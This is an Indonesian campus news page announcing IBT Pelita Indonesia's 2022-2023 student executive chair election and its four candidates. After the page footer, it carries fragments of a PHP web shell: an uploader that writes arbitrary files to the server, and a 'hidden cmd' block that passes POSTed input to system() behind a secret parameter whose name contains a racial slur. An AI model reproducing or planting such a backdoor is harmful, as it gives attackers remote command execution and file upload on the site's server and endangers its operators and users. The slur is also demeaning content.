#

Kenali Calon Ketua BEM Kamu Melalui Program Nongkrong Bareng Pelita Indonesia

Institut Bisnis dan Teknologi (IBT) Pelita Indonesia kembali memasuki masa pemilihan Ketua Badan Eksekutif Mahasiswa (BEM) tahun jabatan 2022-2023. Pemungutan suaranya akan berlangsung secara daring melalui aplikasi SIPOPI pada tanggal 23 hingga 25 Mei 2022, dan hasilnya akan diumumkan pada tanggal 30 Mei 2022. Untuk pemilihan kali ini, terdapat empat orang yang memperebutkan posisi Ketua BEM Pelita Indonesia, yaitu Ricky Febrio pada nomor urut 1, Cindy pada nomor urut 2, Stevent Marcel pada nomor urut 3, dan Esperansa pada nomor urut 4.

Kata pepatah, tak kenal maka tak sayang, apalagi kondisi pandemi telah membuat minimnya interaksi sosial diantara mahasiswa. Menyikapi hal tersebut, maka Tim Kreatif IBT Pelita Indonesia membuat program baru yang bertajuk, “Nongkrong Bareng Pelita Indonesia (#NongBarPI). Sebagai episode perdana, program ini mengundang keempat calon Ketua BEM Pelita Indonesia untuk memberikan cara pandang, pendapat, sera program kerja dari masing-masing calon ketua, dan dipandu secara langsung oleh Stefani Chandra, B.BusCom., MIB. dan Andi, S.Kom., M.M.

Simak terus update mengenai pemilihan Ketua BEM Pelita Indonesia tahun jabatan 2022-2023 melalui Instagram Pelita Indonesia di @pelitaindonesia

#IBTPI #PelitaIndonesia #NongBarPI #NongkrongBarengPelitaIndonesia #BEMPelitaIndonesia #Pelitanesians #VoteYourBestLeader

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>